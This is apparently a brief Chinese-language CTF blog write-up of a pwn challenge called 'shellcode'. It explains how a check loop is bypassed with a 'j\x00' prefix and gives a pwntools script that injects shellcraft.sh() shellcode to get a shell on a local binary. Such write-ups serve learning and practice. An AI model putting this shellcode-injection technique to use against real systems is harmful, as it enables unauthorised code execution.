shellcode

今天来记录一下shellcode的新题

管他三七二十一常规操作

哦买噶竟然给开了 NX保护

但是莫慌莫慌    继续

 

 

看看逻辑找破绽 

发现了什么1.出现了mmap函数就去查

                   2.有判断条件就顺下去找漏洞

 

好的进去找，看看看看这不就是逻辑吗pwn他pwn他

 

 

 在里面循环判断判断

但是判断一下发现       重点是啥么，要是while（0），就可以绕开！！！！

好的啦

from pwn import*
context(os='linux', arch='amd64', log_level='debug')
io=process("./shellcode")
payload = 'j\x00'+asm(shellcraft.sh())
io.sendline(payload)
io.interactive()

 

 这就要来解释一下

我们需要把   0   地址，送进去sendline  要用到汇编语言

这三个知识点要了解一下：

       1.  context(os='linux', arch='amd64', log_level='debug')

　　2.  asm(shellcraft.sh()

　　3.  'j\x00'

 

 

好的，因为没有远程服务器就只能自己打自己

搞一个flag文件

 

 

搜索

复制